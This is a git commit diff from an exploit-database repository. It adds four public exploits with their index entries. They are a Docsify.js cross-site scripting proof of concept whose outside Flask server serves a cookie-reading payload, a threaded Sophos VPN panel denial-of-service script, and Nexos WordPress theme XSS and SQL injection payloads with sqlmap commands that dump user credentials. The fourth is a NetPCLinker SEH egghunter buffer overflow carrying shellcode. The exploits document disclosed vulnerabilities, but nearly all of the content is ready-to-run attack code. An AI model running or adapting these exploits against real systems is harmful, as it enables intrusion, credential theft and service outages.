DB: 2020-07-23
4 changes to exploits/shellcodes NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter) Docsify.js 4.11.4 - Reflective Cross-Site Scripting WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection Sophos VPN Web Panel 2020 - Denial of Service (Poc)
This commit is contained in:
parent
bd3d5964fc
commit
67c1f99f41
5 changed files with 284 additions and 0 deletions
66
exploits/multiple/webapps/48681.txt
Normal file
66
exploits/multiple/webapps/48681.txt
Normal file
|
@ -0,0 +1,66 @@
|
|||
# Exploit Title: Docsify.js 4.11.4 - Reflective Cross-Site Scripting
|
||||
# Date: 2020-06-22
|
||||
# Exploit Author: Amin Sharifi
|
||||
# Vendor Homepage: https://docsify.js.org
|
||||
# Software Link: https://github.com/docsifyjs/docsify
|
||||
# Version: 4.11.4
|
||||
# Tested on: Windows 10
|
||||
# CVE : CVE-2020-7680
|
||||
|
||||
|
||||
docsify.js uses fragment identifiers (parameters after # sign) to load
|
||||
resources from server-side .md files. it then renders the .md file inside
|
||||
the HTML page.
|
||||
|
||||
For example : https://docsify.js.org/#/quickstart sends an ajax to
|
||||
https://docsify.js.org/quickstart.md and renders it inside the html page.
|
||||
|
||||
due to lack of validation it is possible to provide external URLs after the
|
||||
/#/ and render arbitrary javascript/HTML inside the page which leads to
|
||||
DOM-based Cross Site Scripting (XSS).
|
||||
|
||||
|
||||
Steps to reproduce:
|
||||
|
||||
step 1. setup a server (for example I use flask here, for the POC im
|
||||
hosting one on https://asharifi.pythonanywhere.com )
|
||||
|
||||
step 2. the server should respond to request to /README.md with a crafted
|
||||
XSS payload. here is the payload "Html Injection and XSS PoC</p><img src=1
|
||||
onerror=alert(1)><img src=1 onerror=alert(document.cookie)><p>"
|
||||
also the CORS should be set so that other Origins would be able to send
|
||||
ajax requests to the server so Access-Control-Allow-Origin must be set to *
|
||||
(or to the specific domain that you wanna exploit) example code below:
|
||||
|
||||
-------------------------------------------------
|
||||
from flask import Flask
|
||||
import flask
|
||||
|
||||
app = Flask(__name__)
|
||||
|
||||
|
||||
@app.route('/README.md')
|
||||
def inject():
|
||||
resp = flask.Response("Html Injection and XSS PoC</p><img src=1
|
||||
onerror=alert(1)><img src=1 onerror=alert(document.cookie)><p>")
|
||||
resp.headers['Access-Control-Allow-Origin'] = '*'
|
||||
return resp
|
||||
|
||||
------------------------------------------------------
|
||||
step 3. craft the link for execution of the exploit
|
||||
for example for https://docsify.js.org website you can create the link as
|
||||
below
|
||||
|
||||
https://docsify.js.org/#//asharifi.pythonanywhere.com/README
|
||||
(note that the mentioned domain is no longer vulnerable at the time writing
|
||||
this report)
|
||||
|
||||
when a user visits this URL an ajax request will be sent to
|
||||
asharifi.pythonanywhere.com/README.md and the response of the request will
|
||||
be rendered inside the webpage which results in XSS payload being executed
|
||||
on the page.
|
||||
|
||||
|
||||
snyk advisory: https://snyk.io/vuln/SNYK-JS-DOCSIFY-567099
|
||||
Mitre CVE entry:
|
||||
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7680
|
99
exploits/multiple/webapps/48683.py
Executable file
99
exploits/multiple/webapps/48683.py
Executable file
|
@ -0,0 +1,99 @@
|
|||
# Exploit Title: Sophos VPN Web Panel 2020 - Denial of Service (Poc)
|
||||
# Date: 2020-06-17
|
||||
# Exploit Author: Berk KIRAS
|
||||
# Vendor Homepage: https://www.sophos.com/
|
||||
# Version:2020 Web Panel
|
||||
# Tested on: Apache
|
||||
# Berk KIRAS PwC - Cyber Security Specialist
|
||||
# Sophos VPN Web Portal Denial of Service Vulnerability
|
||||
# System parse JSON data. If we want to send some JSON with invalid data format
|
||||
# for ex. valid -> {"test","test2"} , invalid -> {"test",PAYLOAD"test2"}
|
||||
# The system can not parse this data fastly and service down
|
||||
# payload_option2 ="../../../../../../../../../FILE./FILE"
|
||||
|
||||
#!/usr/bin/python3
|
||||
|
||||
import requests
|
||||
import sys
|
||||
import random
|
||||
import threading
|
||||
|
||||
def send_req():
|
||||
cnt = random.randint(9,22)
|
||||
payload= "../"*cnt+'{FILE}'
|
||||
my_datas_params = {"username":"test",
|
||||
payload+"password":"admin",
|
||||
"cookie":"0",
|
||||
"submit":"<div class=\"login_screen_login_button_left\"></div><div class=\"login_screen_login_button_middle\">Oturum Aç</div><div class=\"login_screen_login_button_right\"></div>",
|
||||
"language":"turkish",
|
||||
"browser_id":"kbgacsyo-q4j5o7lr70e"}
|
||||
|
||||
# You should change some values into the headers
|
||||
Host_addr = sys.argv[2]
|
||||
Origin=sys.argv[1]+"://"+sys.argv[2]
|
||||
Referrer=sys.argv[1]+"://"+sys.argv[2]
|
||||
Cookie=sys.argv[4]
|
||||
#Headers
|
||||
my_datas_headers ={
|
||||
"Host":str(Host_addr),
|
||||
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0",
|
||||
"Accept": "text/javascript, text/html, application/xml, text/xml, */*",
|
||||
"Accept-Language": "tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3",
|
||||
"Accept-Encoding": "gzip, deflate",
|
||||
"X-Requested-With": "XMLHttpRequest",
|
||||
"X-Prototype-Version": "1.6.1_rc3",
|
||||
"Content-type": "application/json; charset=UTF-8",
|
||||
"Origin":Origin,
|
||||
"Connection": "close",
|
||||
"Referer":Referrer,
|
||||
"Cookie":Cookie,
|
||||
}
|
||||
my_datas_headers2 ={
|
||||
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0",
|
||||
"Accept": "text/javascript, text/html, application/xml, text/xml, */*",
|
||||
"Accept-Language": "tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3",
|
||||
"Accept-Encoding": "gzip, deflate",
|
||||
"X-Requested-With": "XMLHttpRequest",
|
||||
"X-Prototype-Version": "1.6.1_rc3",
|
||||
"Content-type": "application/json; charset=UTF-8",
|
||||
"Connection": "close",
|
||||
}
|
||||
#If you want to edit and add headers some headers added
|
||||
s = requests.session()
|
||||
#if you want simple-> headers={'User-Agent': 'Mozilla', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive'}
|
||||
s.headers.update(my_datas_headers2)
|
||||
print(s.headers.items)
|
||||
r = s.post(sys.argv[1]+"://"+sys.argv[2]+sys.argv[3],data=my_datas_params)
|
||||
|
||||
return s
|
||||
|
||||
def main():
|
||||
if(len(sys.argv) < 6):
|
||||
print("Usage:1) Implement your headers \n2)change payload if you want \n3) exploit.py <http/https> <domain> <page> <cookie-val> <Thread(1-10)> \nExample-> exploit.py http vpn.test.com /test/index.plx 2\nCoded by b3rkk1r4s | PwC Cyber")
|
||||
sys.exit(0)
|
||||
else:
|
||||
try:
|
||||
req_count=0
|
||||
while(True):
|
||||
if(int(sys.argv[5])==1):
|
||||
resp = send_req()
|
||||
req_count=req_count+1
|
||||
print("Sending Requests... Count: "+str(req_count))
|
||||
else:
|
||||
threads = int(sys.argv[5])
|
||||
jobs = []
|
||||
for i in range(0, threads):
|
||||
out_list = list()
|
||||
thread = threading.Thread(target=send_req)
|
||||
jobs.append(thread)
|
||||
for j in jobs:
|
||||
j.start()
|
||||
print("Jobs Started!")
|
||||
# Ensure all of the threads have finished
|
||||
for j in jobs:
|
||||
j.join()
|
||||
|
||||
except Exception:
|
||||
print(Exception)
|
||||
|
||||
main()
|
53
exploits/php/webapps/48682.txt
Normal file
53
exploits/php/webapps/48682.txt
Normal file
|
@ -0,0 +1,53 @@
|
|||
# Exploit Title: WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection
|
||||
# Google Dork: inurl:/wp-content/themes/nexos/
|
||||
# Date: 2020-06-17
|
||||
# Exploit Author: Vlad Vector
|
||||
# Vendor: Sanljiljan [ https://themeforest.net/user/sanljiljan ]
|
||||
# Software Version: 1.7
|
||||
# Software Link: https://themeforest.net/item/nexos-real-estate-agency-directory/21126242
|
||||
# Tested on: Debian 10
|
||||
# CVE: CVE-2020-15363, CVE-2020-15364
|
||||
# CWE: CWE-79, CWE-89
|
||||
|
||||
|
||||
|
||||
### [ Info: ]
|
||||
|
||||
[i] The Nexos theme through 1.7 for WordPress allows side-map/?search_order= SQL Injection.
|
||||
|
||||
|
||||
|
||||
### [ Vulnerabilities: ]
|
||||
|
||||
[x] Unauthenticated Reflected XSS
|
||||
[x] SQL Injection
|
||||
|
||||
|
||||
|
||||
### [ PoC Unauthenticated Reflected XSS: ]
|
||||
|
||||
[!] TARGET/TARGET-DIR/top-map/?search_order=idlisting DESC&search_location="><img src=x onerror=alert(`VLΛDVΞCTOR`);window.location=`https://twitter.com/vlad_vector`%3E>
|
||||
|
||||
[!] GET /TARGET-DIR/top-map/?search_order=idlisting%20DESC&search_location=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://twitter.com/vlad_vector`%3E%3E HTTP/1.1
|
||||
Host: listing-themes.com
|
||||
|
||||
|
||||
|
||||
### [ PoC SQL Injection: ]
|
||||
|
||||
[!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -dbs --random-agent --threads 4
|
||||
|
||||
[02:23:33] [INFO] the back-end DBMS is MySQL
|
||||
[02:23:33] [INFO] fetching database names
|
||||
[02:23:33] [INFO] fetching number of databases
|
||||
[02:23:33] [INFO] resumed: 2
|
||||
available databases [2]:
|
||||
[*] geniuscr_nexos
|
||||
[*] information_schema
|
||||
|
||||
[!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -D geniuscr_nexos -T wp_users -C user_login,user_pass,user_email --random-agent --threads 8
|
||||
|
||||
Database: TARGET-DB
|
||||
Table: wp_users
|
||||
[9 entries]
|
||||
+--------------+------------------------------------+-------------------------+
|
62
exploits/windows/local/48680.py
Executable file
62
exploits/windows/local/48680.py
Executable file
|
@ -0,0 +1,62 @@
|
|||
# Exploit Title: NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)
|
||||
# Date: 2019-06-28
|
||||
# Exploit Author: Saeed reza Zamanian
|
||||
# Vendor Homepage: https://sourceforge.net/projects/netpclinker/
|
||||
# Software Link: https://sourceforge.net/projects/netpclinker/files/
|
||||
# Version: 1.0.0.0
|
||||
# Tested on: Windows Vista SP1
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
'''
|
||||
# Replicate Crash:
|
||||
1) Install and Run the application
|
||||
2) Go to second tab "Clients Control Panel"
|
||||
3) Press Add button
|
||||
4) Run the exploit , the exploit creates a text file named payload.txt
|
||||
5) Copy payload.txt contents into the add client dialog , "DNS/IP" field
|
||||
6) Press OK . Your shellcode will be executed by pressing OK button.
|
||||
|
||||
'''
|
||||
|
||||
#msfvenom -p windows/exec CMD=calc -f c -b "\x00\x0a\x0d\x33\x35\x36"
|
||||
#Bad Characters : \x0a\x0d\x33\x35\x36
|
||||
|
||||
shellcode = (
|
||||
"\xdb\xc4\xd9\x74\x24\xf4\x5b\xbe\x9a\x32\x43\xd2\x31\xc9\xb1"
|
||||
"\x30\x83\xc3\x04\x31\x73\x14\x03\x73\x8e\xd0\xb6\x2e\x46\x96"
|
||||
"\x39\xcf\x96\xf7\xb0\x2a\xa7\x37\xa6\x3f\x97\x87\xac\x12\x1b"
|
||||
"\x63\xe0\x86\xa8\x01\x2d\xa8\x19\xaf\x0b\x87\x9a\x9c\x68\x86"
|
||||
"\x18\xdf\xbc\x68\x21\x10\xb1\x69\x66\x4d\x38\x3b\x3f\x19\xef"
|
||||
"\xac\x34\x57\x2c\x46\x06\x79\x34\xbb\xde\x78\x15\x6a\x55\x23"
|
||||
"\xb5\x8c\xba\x5f\xfc\x96\xdf\x5a\xb6\x2d\x2b\x10\x49\xe4\x62"
|
||||
"\xd9\xe6\xc9\x4b\x28\xf6\x0e\x6b\xd3\x8d\x66\x88\x6e\x96\xbc"
|
||||
"\xf3\xb4\x13\x27\x53\x3e\x83\x83\x62\x93\x52\x47\x68\x58\x10"
|
||||
"\x0f\x6c\x5f\xf5\x3b\x88\xd4\xf8\xeb\x19\xae\xde\x2f\x42\x74"
|
||||
"\x7e\x69\x2e\xdb\x7f\x69\x91\x84\x25\xe1\x3f\xd0\x57\xa8\x55"
|
||||
"\x27\xe5\xd6\x1b\x27\xf5\xd8\x0b\x40\xc4\x53\xc4\x17\xd9\xb1"
|
||||
"\xa1\xe8\x93\x98\x83\x60\x7a\x49\x96\xec\x7d\xa7\xd4\x08\xfe"
|
||||
"\x42\xa4\xee\x1e\x27\xa1\xab\x98\xdb\xdb\xa4\x4c\xdc\x48\xc4"
|
||||
"\x44\xbf\x0f\x56\x04\x40"
|
||||
)
|
||||
|
||||
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x65\x7a\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
|
||||
nSEH = '\xEB\xAA\x90\x90' #Jump Back
|
||||
|
||||
# (Vista)
|
||||
# PPR(ecx) : 0x00494b67 : startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [NPL.exe]
|
||||
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.0 (C:\Program Files\NetPCLinker\NPL.exe)
|
||||
|
||||
SEH = '\x67\x4b\x49'
|
||||
offset = "RezaReza"+shellcode +'\x41'*(1199-8-len(shellcode)-len(egghunter)-50)
|
||||
|
||||
payload = offset+egghunter+"\x90"*50+nSEH+SEH
|
||||
|
||||
try:
|
||||
f=open("payload.txt","w")
|
||||
print("[+] Creating %s bytes payload." %len(payload))
|
||||
f.write(payload)
|
||||
f.close()
|
||||
print("[+] File created!")
|
||||
except:
|
||||
print("File cannot be created.")
|
|
@ -11122,6 +11122,7 @@ id,file,description,date,author,type,platform,port
|
|||
48644,exploits/hardware/local/48644.c,"Sony Playstation 4 (PS4) < 7.02 / FreeBSD 9 / FreeBSD 12 - 'ip6_setpktopt' Kernel Local Privilege Escalation (PoC)",2020-03-21,TheFloW,local,hardware,
|
||||
48677,exploits/windows/local/48677.txt,"Sonar Qube 8.3.1 - 'SonarQube Service' Unquoted Service Path",2020-07-17,"Velayutham Selvaraj",local,windows,
|
||||
48678,exploits/windows/local/48678.py,"Simple Startup Manager 1.17 - 'File' Local Buffer Overflow (PoC)",2020-07-17,PovlTekstTV,local,windows,
|
||||
48680,exploits/windows/local/48680.py,"NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)",2020-07-22,"Saeed reza Zamanian",local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -42926,3 +42927,6 @@ id,file,description,date,author,type,platform,port
|
|||
48674,exploits/php/webapps/48674.txt,"Infor Storefront B2B 1.0 - 'usr_name' SQL Injection",2020-07-15,ratboy,webapps,php,
|
||||
48676,exploits/lua/webapps/48676.txt,"Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated)",2020-07-16,V1n1v131r4,webapps,lua,
|
||||
48679,exploits/php/webapps/48679.txt,"CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)",2020-07-17,Noth,webapps,php,
|
||||
48681,exploits/multiple/webapps/48681.txt,"Docsify.js 4.11.4 - Reflective Cross-Site Scripting",2020-07-22,"Amin Sharifi",webapps,multiple,
|
||||
48682,exploits/php/webapps/48682.txt,"WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection",2020-07-22,"Vlad Vector",webapps,php,
|
||||
48683,exploits/multiple/webapps/48683.py,"Sophos VPN Web Panel 2020 - Denial of Service (Poc)",2020-07-22,"Berk KIRAS",webapps,multiple,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue